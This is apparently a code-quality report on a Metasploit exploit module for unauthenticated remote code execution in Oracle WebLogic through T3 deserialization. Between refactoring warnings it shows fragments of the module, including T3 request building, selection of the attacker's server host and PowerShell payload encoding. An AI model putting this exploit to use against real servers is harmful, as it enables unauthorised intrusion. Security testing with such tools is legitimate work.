modules/exploits/multi/misc/weblogic_deserialize_unicastref.rb
File weblogic_deserialize_unicastref.rb
has 558 lines of code (exceeds 250 allowed). Consider refactoring. Open
Open
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::TcpServer
Method build_t3_request_object
has 199 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def build_t3_request_object
# T3 request serialized data
# retrieved by watching network traffic
# This is a proprietary, undocumented protocol
data = '000005c3' # lenght of the packet
Method send_payload_objdata
has 130 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def send_payload_objdata
shost = srvhost
if ['0.0.0.0', '127.0.0.1', '::'].include?(shost)
shost = Rex::Socket.source_address
end
Method gen_resp
has 86 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def gen_resp
if target.name == 'Windows'
pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
elsif target.name == 'Unix' || target.name == 'Solaris'
Method initialize
has 59 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle Weblogic Server Deserialization RCE - RMI UnicastRef',
'Description' => %q{
An unauthenticated attacker with network access to the Oracle Weblogic Server T3